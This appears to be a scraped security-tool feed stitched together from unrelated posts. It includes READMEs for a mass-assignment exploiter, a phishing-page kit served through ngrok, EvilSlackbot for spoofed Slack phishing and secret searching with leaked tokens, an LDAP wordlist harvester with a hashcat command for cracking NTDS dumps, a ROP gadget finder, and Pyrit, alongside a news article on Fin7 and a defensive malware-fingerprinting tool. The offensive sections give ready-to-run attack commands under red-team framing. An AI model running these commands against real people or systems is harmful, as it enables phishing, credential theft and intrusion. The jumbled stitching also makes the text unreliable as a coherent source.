Mass Assigner is a powerful tool designed to identify and exploit mass assignment vulnerabilities in web applications. It achieves this by first retrieving data from a specified request, such as fetching user profile data. It then systematically applies each parameter extracted from the response to a second, user-supplied request, one parameter at a time. This approach allows for the automated testing and exploitation of potential mass assignment vulnerabilities.
This tool actively modifies server-side data. Please ensure you have proper authorization before use. Any unauthorized or illegal activity using this tool is entirely at your own risk.
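The probing approach described above can be sketched in a few lines. This is only an illustration of the idea, not the tool's implementation; the endpoints, header, and HTTP methods below are placeholders.

```python
import requests

# Placeholder endpoints and header; adjust to the application under test.
FETCH_URL = "http://example.com/api/v1/me"
TARGET_URL = "http://example.com/api/v1/me"
HEADERS = {"Authorization": "Bearer XXX"}

# Step 1: fetch the object and collect its parameters.
baseline = requests.get(FETCH_URL, headers=HEADERS).json()

# Step 2: resend each parameter on its own and watch how the server reacts.
for key, value in baseline.items():
    resp = requests.put(TARGET_URL, headers=HEADERS, json={key: value})
    print(f"{key}: HTTP {resp.status_code}, {len(resp.content)} bytes")
```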
Install requirements
pip3 install -r requirements.txt
Run the script
python3 mass_assigner.py --fetch-from "http://example.com/path-to-fetch-data" --target-req "http://example.com/path-to-probe-the-data"
Mass Assigner accepts the following arguments:
-h, --help show this help message and exit
--fetch-from FETCH_FROM
URL to fetch data from
--target-req TARGET_REQ
URL to send modified data to
-H HEADER, --header HEADER
Add a custom header. Format: 'Key: Value'
-p PROXY, --proxy PROXY
Use a proxy, e.g.: http://127.0.0.1:8080
-d DATA, --data DATA Add data to the request body. JSON is supported with escaping.
--rate-limit RATE_LIMIT
Number of requests per second
--source-method SOURCE_METHOD
HTTP method for the initial request. Default is GET.
--target-method TARGET_METHOD
HTTP method for the modified request. Default is PUT.
--ignore-params IGNORE_PARAMS
Parameters to ignore during modification, separated by comma.
Example Usage:
python3 mass_assigner.py --fetch-from "http://example.com/api/v1/me" --target-req "http://example.com/api/v1/me" --header "Authorization: Bearer XXX" --proxy "http://proxy.example.com" --data '{\"param1\": \"test\", \"param2\":true}'
The Russia-based cybercrime group dubbed "Fin7," known for phishing and malware attacks that have cost victim organizations an estimated $3 billion in losses since 2013, was declared dead last year by U.S. authorities. But experts say Fin7 has roared back to life in 2024, setting up thousands of websites mimicking a range of media and technology companies, with the help of Stark Industries Solutions, a sprawling hosting provider that is a persistent source of cyberattacks against enemies of Russia.
In May 2023, the U.S. attorney for Washington state declared "Fin7 is an entity no more," after prosecutors secured convictions and prison sentences against three men found to be high-level Fin7 hackers or managers. This was a bold declaration against a group that the U.S. Department of Justice described as a criminal enterprise with more than 70 people organized into distinct business units and teams.
The first signs of Fin7's revival came in April 2024, when Blackberry wrote about an intrusion at a large automotive firm that began with malware served by a typosquatting attack targeting people searching for a popular free network scanning tool.
Now, researchers at security firm Silent Push say they have devised a way to map out Fin7's rapidly regrowing cybercrime infrastructure, which includes more than 4,000 hosts that employ a range of exploits, from typosquatting and booby-trapped ads to malicious browser extensions and spearphishing domains.
Silent Push said it found Fin7 domains targeting or spoofing brands including American Express, Affinity Energy, Airtable, Alliant, Android Developer, Asana, Bitwarden, Bloomberg, Cisco (Webex), CNN, Costco, Dropbox, Grammarly, Google, Goto.com, Harvard, Lexis Nexis, Meta, Microsoft 365, Midjourney, Netflix, Paycor, Quickbooks, Quicken, Reuters, Regions Bank Onepass, RuPay, SAP (Ariba), Trezor, Twitter/X, Wall Street Journal, Westlaw, and Zoom, among others.
Zach Edwards, senior threat analyst at Silent Push, said many of the Fin7 domains are innocuous-looking websites for generic businesses that sometimes include text from default website templates (the content on these sites often has nothing to do with the entity's stated business or mission).
Edwards said Fin7 does this to "age" the domains and to give them a positive or at least benign reputation before they're eventually converted for use in hosting brand-specific phishing pages.
"It took them six to nine months to ramp up, but ever since January of this year they have been humming, building a giant phishing infrastructure and aging domains," Edwards said of the cybercrime group.
In typosquatting attacks, Fin7 registers domains that are similar to those of popular free software tools. Those look-alike domains are then advertised on Google so that sponsored links to them show up prominently in search results, usually above the legitimate source of the software in question.
A malicious site spoofing FreeCAD showed up prominently as a sponsored result in Google search results earlier this year.
According to Silent Push, the software currently being targeted by Fin7 includes 7-zip, PuTTY, ProtectedPDFViewer, AIMP, Notepad++, Advanced IP Scanner, AnyDesk, pgAdmin, AutoDesk, Bitwarden, Rest Proxy, Python, Sublime Text, and Node.js.
In May 2024, security firm eSentire warned that Fin7 was spotted using sponsored Google ads to serve pop-ups prompting people to download phony browser extensions that install malware. Malwarebytes blogged about a similar campaign in April, but did not attribute the activity to any particular group.
A pop-up at a Thomson Reuters typosquatting domain telling visitors they need to install a browser extension to view the news content.
Edwards said Silent Push discovered the new Fin7 domains after hearing from an organization that was targeted by Fin7 in years past and suspected the group was once again active. Searching for hosts that matched Fin7's known profile revealed just one active site. But Edwards said that one site pointed to many other Fin7 properties at Stark Industries Solutions, a large hosting provider that materialized just two weeks before Russia invaded Ukraine.
As KrebsOnSecurity wrote in May, Stark Industries Solutions is being used as a staging ground for wave after wave of cyberattacks against Ukraine that have been tied to Russian military and intelligence agencies.
"FIN7 rents a large amount of dedicated IP on Stark Industries," Edwards said. "Our analysts have discovered numerous Stark Industries IPs that are solely dedicated to hosting FIN7 infrastructure."
Fin7 once famously operated behind fake cybersecurity companies, with names like Combi Security and Bastion Secure, which they used for hiring security experts to aid in ransomware attacks. One of the new Fin7 domains identified by Silent Push is cybercloudsec[.]com, which promises to "grow your business with our IT, cyber security and cloud solutions."
The fake Fin7 security firm Cybercloudsec.
Like other phishing groups, Fin7 seizes on current events, and at the moment it is targeting tourists visiting France for the Summer Olympics later this month. Among the new Fin7 domains Silent Push found are several sites phishing people seeking tickets at the Louvre.
"We believe this research makes it clear that Fin7 is back and scaling up quickly," Edwards said. "It's our hope that the law enforcement community takes notice of this and puts Fin7 back on their radar for additional enforcement actions, and that quite a few of our competitors will be able to take this pool and expand into all or a good chunk of their infrastructure."
Further reading:
Stark Industries Solutions: An Iron Hammer in the Cloud.
A 2022 deep dive on Fin7 from the Swiss threat intelligence firm Prodaft (PDF).
Tool for Fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage :-)
Its main objective is to provide unique representations (fingerprints) of malware requests, which help in their identification. Unique means here that each fingerprint should be seen in only one particular malware family, yet one family can have multiple fingerprints. Hfinger represents the request in a shorter form than printing the whole request, while remaining human-interpretable.
Hfinger can be used in manual malware analysis but also in sandbox systems or SIEMs. The generated fingerprints are useful for grouping requests, pinpointing requests to particular malware families, identifying different operations of one family, or discovering unknown malicious requests omitted by other security systems but which share a fingerprint.
An academic paper accompanies work on this tool, describing, for example, the motivation of design choices, and the evaluation of the tool compared to p0f, FATT, and Mercury.
The basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about the structure and values of some headers to provide means for further analysis, for example grouping of similar requests (at this moment, this is still a work in progress).
After analysis of malware's HTTP requests and headers, we have identified some parts of requests as being most distinctive. These include:
* Request method
* Protocol version
* Header order
* Popular headers' values
* Payload length, entropy, and presence of non-ASCII characters
Additionally, some standard features of the request URL were also considered. All these parts were translated into a set of features, described in detail here.
The above features are translated into a varying-length representation, which is the actual fingerprint. Depending on the report mode, different features are used to fingerprint requests. More information on these modes is presented below. The feature selection process will be described in the forthcoming academic paper.
Minimum requirements needed before installation:
* Python >= 3.3
* Tshark >= 2.2.0
Installation available from PyPI:
pip install hfinger
Hfinger has been tested on Xubuntu 22.04 LTS with the tshark package in version 3.6.2, but it should work with older versions, such as 2.6.10 on Xubuntu 18.04 or 3.2.3 on Xubuntu 20.04.
Please note that, as with any PoC, you should run Hfinger in a separate environment, at least in a Python virtual environment. Its setup is not covered here, but you can try this tutorial.
After installation, you can call the tool directly from the command line with hfinger or as a Python module with python -m hfinger.
For example:
foo@bar:~$ hfinger -f /tmp/test.pcap
[{"epoch_time": "1614098832.205385000", "ip_src": "127.0.0.1", "ip_dst": "127.0.0.1", "port_src": "53664", "port_dst": "8080", "fingerprint": "2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4"}]
Help can be displayed with the short -h or long --help switch:
usage: hfinger [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2,3,4}] [-v]
[-l LOGFILE]
Hfinger - fingerprinting malware HTTP requests stored in pcap files
optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE Read a single pcap file
-d DIR, --directory DIR
Read pcap files from the directory DIR
-o output_path, --output-path output_path
Path to the output directory
-m {0,1,2,3,4}, --mode {0,1,2,3,4}
Fingerprint report mode.
0 - similar number of collisions and fingerprints as mode 2, but using fewer features,
1 - representation of all designed features, but a little more collisions than modes 0, 2, and 4,
2 - optimal (the default mode),
3 - the lowest number of generated fingerprints, but the highest number of collisions,
4 - the highest fingerprint entropy, but slightly more fingerprints than modes 0-2
-v, --verbose Report information about non-standard values in the request
(e.g., non-ASCII characters, no CRLF tags, values not present in the configuration list).
Without --logfile (-l) will print to the standard error.
-l LOGFILE, --logfile LOGFILE
Output logfile in the verbose mode. Implies -v or --verbose switch.
You must provide a path to a pcap file (-f), or a directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to the provided directory (-o) using the name of the source file. For example, output of the command:
hfinger -f example.pcap -o /tmp/pcap
will be saved to:
/tmp/pcap/example.pcap.json
The report mode -m/--mode can be used to change the default report mode by providing an integer in the range 0-4. The modes differ in the represented request features or rounding modes. The default mode (2) was chosen by us to represent all features that are usually used during requests' analysis, while also offering a low number of collisions and generated fingerprints. With other modes, you can achieve different goals; for example, in mode 3 you get a lower number of generated fingerprints but a higher chance of a collision between malware families. If you are unsure, you don't have to change anything. More information on report modes is here.
Beginning with version 0.2.1, Hfinger is less verbose. You should use -v/--verbose if you want to receive information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. When any such issues are encountered in verbose mode, they will be printed to the standard error output. You can also save the log to a defined location using the -l/--logfile switch (it implies -v/--verbose). The log data will be appended to the log file.
Beginning with version 0.2.0, Hfinger supports importing into other Python applications. To use it in your app, simply import the hfinger_analyze function from hfinger.analysis and call it with a path to the pcap file and a reporting mode. The returned result is a list of dicts with fingerprinting results.
For example:
from hfinger.analysis import hfinger_analyze
pcap_path = "SPECIFY_PCAP_PATH_HERE"
reporting_mode = 4
print(hfinger_analyze(pcap_path, reporting_mode))
Beginning with version 0.2.1, Hfinger uses the logging module for logging information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. Hfinger creates its own logger using the name hfinger, but without prior configuration this log information is in practice discarded. If you want to receive it, before calling hfinger_analyze you should configure the hfinger logger: set the log level to logging.INFO, configure a log handler to your needs, and add it to the logger. More information is available in the hfinger_analyze function docstring.
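A minimal configuration sketch along those lines (the handler and format choices here are arbitrary, not something the tool requires):

```python
import logging

from hfinger.analysis import hfinger_analyze

# Configure the "hfinger" logger before calling hfinger_analyze,
# otherwise its log records are effectively discarded.
logger = logging.getLogger("hfinger")
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()  # or logging.FileHandler("hfinger.log")
handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(message)s"))
logger.addHandler(handler)

print(hfinger_analyze("SPECIFY_PCAP_PATH_HERE", 2))
```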
A fingerprint is based on features extracted from a request. Usage of particular features from the full list depends on the chosen report mode from a predefined list (more information on report modes is here). The figure below represents the creation of an exemplary fingerprint in the default report mode.
Three parts of the request are analyzed to extract information: URI, headers' structure (including method and protocol version), and payload. Particular features of the fingerprint are separated using | (pipe). The final fingerprint generated for the POST request from the example is:
2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4
The creation of features is described below in the order of appearance in the fingerprint.
Firstly, URI features are extracted:
* URI length, represented as a base-10 logarithm of the length, rounded to an integer (in the example the URI is 43 characters long, so log10(43) ≈ 2),
* number of directories (in the example there are 3 directories),
* average directory length, represented as a base-10 logarithm of the actual average directory length, rounded to an integer (in the example there are three directories with a total length of 20 characters (6+6+8), so log10(20/3) ≈ 1),
* extension of the requested file, but only if it is on the list of known extensions in hfinger/configs/extensions.txt,
* average value length, represented as a base-10 logarithm of the actual average value length, rounded to one decimal point (in the example both values are 4 characters long, so the average is 4, and log10(4) ≈ 0.6).
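As a quick sanity check, the roundings quoted above can be reproduced directly (the numbers come from the example; the code itself is just an illustration):

```python
import math

# URI length feature: 43-character URI
print(round(math.log10(43)))              # 2

# Average directory length: three directories, 20 characters in total
print(round(math.log10(20 / 3)))          # 1

# Average value length: two values of 4 characters each
print(round(math.log10((4 + 4) / 2), 1))  # 0.6
```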
Secondly, header structure features are analyzed:
* request method, encoded as the first two letters of the method (PO),
* protocol version, encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9),
* order of the headers,
* and popular headers and their values.
To represent the order of the headers in the request, each header's name is encoded according to the schema in hfinger/configs/headerslow.json; for example, the User-Agent header is encoded as us-ag. Encoded names are separated by ,. If the header name does not start with an upper-case letter (or any of its parts when analyzing compound headers such as Accept-Encoding), then the encoded representation is prefixed with !. If the header name is not on the list of the known headers, it is hashed using the FNV1a hash, and the hash is used as the encoding.
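For reference, FNV1a is a simple xor-and-multiply hash. A minimal 32-bit variant looks roughly like this (the example fingerprints show 8-hex-digit hashes, which suggests a 32-bit width, but treat this sketch as illustrative rather than Hfinger's exact implementation):

```python
def fnv1a_32(data: bytes) -> int:
    """32-bit FNV-1a hash (bit width assumed for illustration)."""
    h = 0x811C9DC5              # FNV offset basis
    for byte in data:
        h ^= byte
        h = (h * 0x01000193) & 0xFFFFFFFF  # FNV prime, kept to 32 bits
    return h

print(f"{fnv1a_32(b'X-Custom-Header'):08x}")
```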
When analyzing popular headers, the request is checked for their presence. These headers are:
* Connection
* Accept-Encoding
* Content-Encoding
* Cache-Control
* TE
* Accept-Charset
* Content-Type
* Accept
* Accept-Language
* User-Agent
When the header is found in the request, its value is checked against a table of typical values to create pairs of header_name_representation:value_representation. The name of the header is encoded according to the schema in hfinger/configs/headerslow.json (as presented before), and the value is encoded according to a schema stored in the hfinger/configs directory or the configs.py file, depending on the header. In the above example, Accept is encoded as ac and its value */* as as-as (asterisk-asterisk), giving ac:as-as. The pairs are inserted into the fingerprint in order of appearance in the request and are delimited using /. If the header value cannot be found in the encoding table, it is hashed using the FNV1a hash.
If the header value is composed of multiple values, they are tokenized to provide a list of values delimited with ,; for example, Accept: */*, text/* would give ac:as-as,te-as. However, at this point of development, if the header value contains a "quality value" tag (q=), then the whole value is encoded with its FNV1a hash. Finally, values of the User-Agent and Accept-Language headers are directly encoded using their FNV1a hashes.
Finally, the payload features:
* presence of non-ASCII characters, represented with the letter N, and with A otherwise,
* payload's Shannon entropy, rounded to an integer,
* and payload length, represented as a base-10 logarithm of the actual payload length, rounded to one decimal point.
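Putting the three payload features together, a rough re-implementation of the description above could look like this (illustrative only; Hfinger's exact rounding and edge-case handling may differ):

```python
import math
from collections import Counter

def payload_features(payload: bytes) -> str:
    """Non-ASCII flag, integer-rounded Shannon entropy, and log10 of length."""
    ascii_flag = "A" if all(b < 128 for b in payload) else "N"
    counts = Counter(payload)
    entropy = -sum((c / len(payload)) * math.log2(c / len(payload))
                   for c in counts.values())
    length = round(math.log10(len(payload)), 1)
    return f"{ascii_flag}|{round(entropy)}|{length}"

print(payload_features(b"id=1&token=abcdef1234"))  # e.g. "A|4|1.3"
```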
Hfinger operates in five report modes, which differ in the features represented in the fingerprint, and thus in the information extracted from requests. These are (with the number used in the tool configuration):
* mode 0 - producing a similar number of collisions and fingerprints as mode 2, but using fewer features,
* mode 1 - representing all designed features, but producing a little more collisions than modes 0, 2, and 4,
* mode 2 - optimal (the default mode), representing all features which are usually used during requests' analysis, but also offering a low number of collisions and generated fingerprints,
* mode 3 - producing the lowest number of generated fingerprints of all modes, but achieving the highest number of collisions,
* mode 4 - offering the highest fingerprint entropy, but also generating slightly more fingerprints than modes 0-2.
The modes were chosen in order to optimize Hfinger's capability to uniquely identify malware families versus the number of generated fingerprints. Modes 0, 2, and 4 offer a similar number of collisions between malware families; however, mode 4 generates a little more fingerprints than the other two. Mode 2 represents more request features than mode 0 with a comparable number of generated fingerprints and collisions. Mode 1 is the only one representing all designed features, but it increases the number of collisions almost twofold compared to modes 0, 2, and 4. Mode 3 produces at least two times fewer fingerprints than the other modes, but it introduces about nine times more collisions. Description of all designed features is here.
The modes consist of the following features (in the order of appearance in the fingerprint):
* mode 0:
  * number of directories,
  * average directory length represented as an integer,
  * extension of the requested file,
  * average value length represented as a float,
  * order of headers,
  * popular headers and their values,
  * payload length represented as a float.
* mode 1:
  * URI length represented as an integer,
  * number of directories,
  * average directory length represented as an integer,
  * extension of the requested file,
  * variable length represented as an integer,
  * number of variables,
  * average value length represented as an integer,
  * request method,
  * version of protocol,
  * order of headers,
  * popular headers and their values,
  * presence of non-ASCII characters,
  * payload entropy represented as an integer,
  * payload length represented as an integer.
* mode 2:
  * URI length represented as an integer,
  * number of directories,
  * average directory length represented as an integer,
  * extension of the requested file,
  * average value length represented as a float,
  * request method,
  * version of protocol,
  * order of headers,
  * popular headers and their values,
  * presence of non-ASCII characters,
  * payload entropy represented as an integer,
  * payload length represented as a float.
* mode 3:
  * URI length represented as an integer,
  * average directory length represented as an integer,
  * extension of the requested file,
  * average value length represented as an integer,
  * order of headers.
* mode 4:
  * URI length represented as a float,
  * number of directories,
  * average directory length represented as a float,
  * extension of the requested file,
  * variable length represented as a float,
  * average value length represented as a float,
  * request method,
  * version of protocol,
  * order of headers,
  * popular headers and their values,
  * presence of non-ASCII characters,
  * payload entropy represented as a float,
  * payload length represented as a float.
Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.
```bash
git clone https://github.com/davenisc/thief_raccoon.git
cd thief_raccoon
```

```bash
apt install python3.11-venv
```

```bash
python -m venv raccoon_venv
source raccoon_venv/bin/activate
```

```bash
pip install -r requirements.txt
```
Usage
```bash
python app.py
```
After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.
If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.
If you want to make the phishing page accessible over the internet, use ngrok.
Using ngrok
Download ngrok from ngrok.com and follow the installation instructions for your operating system.
Expose your local server to the internet:
Get the public URL:
After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.
How to install Ngrok on Linux?
```bash
curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \
  | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \
  && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \
  | sudo tee /etc/apt/sources.list.d/ngrok.list \
  && sudo apt update \
  && sudo apt install ngrok
```

```bash
ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx
```
Deploy your app online
Put your app online on an ephemeral domain by forwarding ngrok to your upstream service. For example, if the app is listening on http://localhost:5000, run:
```bash
ngrok http http://localhost:5000
```
Example
```bash
python app.py
```

```bash
Select the operating system for phishing:
1. Windows 10
2. Windows 11
3. Windows XP
4. Windows Server
5. Ubuntu
6. Ubuntu Server
7. macOS
Enter the number of your choice: 2
```
Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.
Disclaimer
This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.
License
This project is licensed under the MIT License. See the LICENSE file for details.
ScreenShots
Credits
Developer: @davenisc Web: https://davenisc.com
ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.
<binary>: Path to the binary file for analysis.
-s, --search SEARCH: Optional. Search for specific instruction patterns.
-f, --functions: Optional. Print function names and addresses.

python3 ropdump.py /path/to/binary
python3 ropdump.py /path/to/binary -s "pop eax"
python3 ropdump.py /path/to/binary -f
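ROPDump's internals aren't shown here, but the core idea behind gadget hunting can be illustrated with a naive byte-pattern scan for a few ret-terminated x86 sequences. This is purely an educational sketch, not the tool's code:

```python
import sys

# A handful of short x86 sequences that end in ret (0xC3).
GADGETS = {
    b"\x58\xc3": "pop eax; ret",
    b"\x5d\xc3": "pop ebp; ret",
    b"\xc9\xc3": "leave; ret",
}

data = open(sys.argv[1], "rb").read()
for pattern, mnemonic in GADGETS.items():
    offset = data.find(pattern)
    while offset != -1:
        print(f"0x{offset:08x}: {mnemonic}")
        offset = data.find(pattern, offset + 1)
```

A real gadget finder maps file offsets to virtual addresses and disassembles candidate sequences, but the scan-for-ret idea is the same.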
A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.
This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.
Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually granted permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an API token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, and files, and to search for secrets leaked in Slack.
In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (Links, files, spoofed messages)
EvilSlackbot requires python3 and Slackclient
pip3 install slackclient
usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
[-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]
options:
-h, --help show this help message and exit
Required:
-t TOKEN, --token TOKEN
Slack Oauth token
Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc
(Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token
(Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f
and -e,-eL, or -cH)
Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL
Email of target
-cH CHANNEL, --channel CHANNEL
Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST
Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks
associated with your provided token.
-o OUTFILE, --outfile OUTFILE
Outfile to store search results
-cL, --channel_list List all public Slack channels
To use this tool, you must provide a xoxb or xoxp token.
Required:
-t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
python3 EvilSlackbot.py -t <token>
Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.
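That permission check can be approximated with a plain call to Slack's auth.test endpoint: Slack returns the token's granted scopes in the x-oauth-scopes response header. The sketch below shows the idea only; it is not necessarily how EvilSlackbot implements it.

```python
import requests

def token_scopes(token: str) -> list[str]:
    """Validate a Slack token and return the scopes Slack reports for it."""
    r = requests.post(
        "https://slack.com/api/auth.test",
        headers={"Authorization": f"Bearer {token}"},
    )
    r.raise_for_status()
    if not r.json().get("ok"):
        raise ValueError(f"token rejected: {r.json().get('error')}")
    # Slack advertises the granted OAuth scopes in this response header.
    return [s.strip() for s in r.headers.get("x-oauth-scopes", "").split(",") if s.strip()]

print(token_scopes("xoxb-REPLACE-ME"))
```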
Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)
With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>
With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>
With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token, as xoxb tokens can not be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.
python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>
With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>
Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL Email of target
-cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks associated with your provided token.
-o OUTFILE, --outfile OUTFILE Outfile to store search results
-cL, --channel_list List all public Slack channels
With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.
python3 EvilSlackbot.py -t <xoxb token> -cL
A tool to generate a wordlist from the information present in LDAP, in order to crack non-random passwords of domain accounts.
The bigger the domain is, the better the wordlist will be. The wordlist is built from attributes of the LDAP objects, such as name, sAMAccountName, and description, and is written to the file specified with --outputfile.
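As an illustration of where the words come from, the same attributes can be pulled with the ldap3 library roughly as follows. This is a sketch with placeholder credentials matching the example command below, not the tool's code:

```python
from ldap3 import ALL, SUBTREE, Connection, Server

# Placeholder connection details; replace with your own.
server = Server("192.168.1.101", get_info=ALL)
conn = Connection(server, user="Administrator@domain.local",
                  password="P@ssw0rd123!", auto_bind=True)

conn.search("DC=domain,DC=local", "(objectClass=*)",
            search_scope=SUBTREE,
            attributes=["name", "sAMAccountName", "description"])

# Split every attribute value into words and deduplicate them.
words = set()
for entry in conn.entries:
    for values in entry.entry_attributes_as_dict.values():
        for value in values:
            words.update(str(value).split())

print("\n".join(sorted(words)))
```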
To generate a wordlist from the LDAP of the domain domain.local, you can use this command:
./LDAPWordlistHarvester.py -d 'domain.local' -u 'Administrator' -p 'P@ssw0rd123!' --dc-ip 192.168.1.101
Once you have this wordlist, you can crack your NTDS dump using hashcat with --loopback and the clem9669_large.rule rule:
./hashcat --hash-type 1000 --potfile-path ./client.potfile ./client.ntds ./wordlist.txt --rules ./clem9669_large.rule --loopback
$ ./LDAPWordlistHarvester.py -h
LDAPWordlistHarvester.py v1.1 - by @podalirius_
usage: LDAPWordlistHarvester.py [-h] [-v] [-o OUTPUTFILE] --dc-ip ip address [-d DOMAIN] [-u USER] [--ldaps] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]
options:
-h, --help show this help message and exit
-v, --verbose Verbose mode. (default: False)
-o OUTPUTFILE, --outputfile OUTPUTFILE
Path to output file of wordlist.
Authentication & connection:
--dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
-d DOMAIN, --domain DOMAIN
(FQDN) domain to authenticate to
-u USER, --user USER user to authenticate with
--ldaps Use LDAPS instead of LDAP
Credentials:
--no-pass Don't ask for password (useful for -k)
-p PASSWORD, --password PASSWORD
Password to authenticate with
-H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
NT/LM hashes, format is LMhash:NThash
--aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
Pyrit allows you to create massive databases of the pre-computed WPA/WPA2-PSK authentication phase in a space-time trade-off. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.
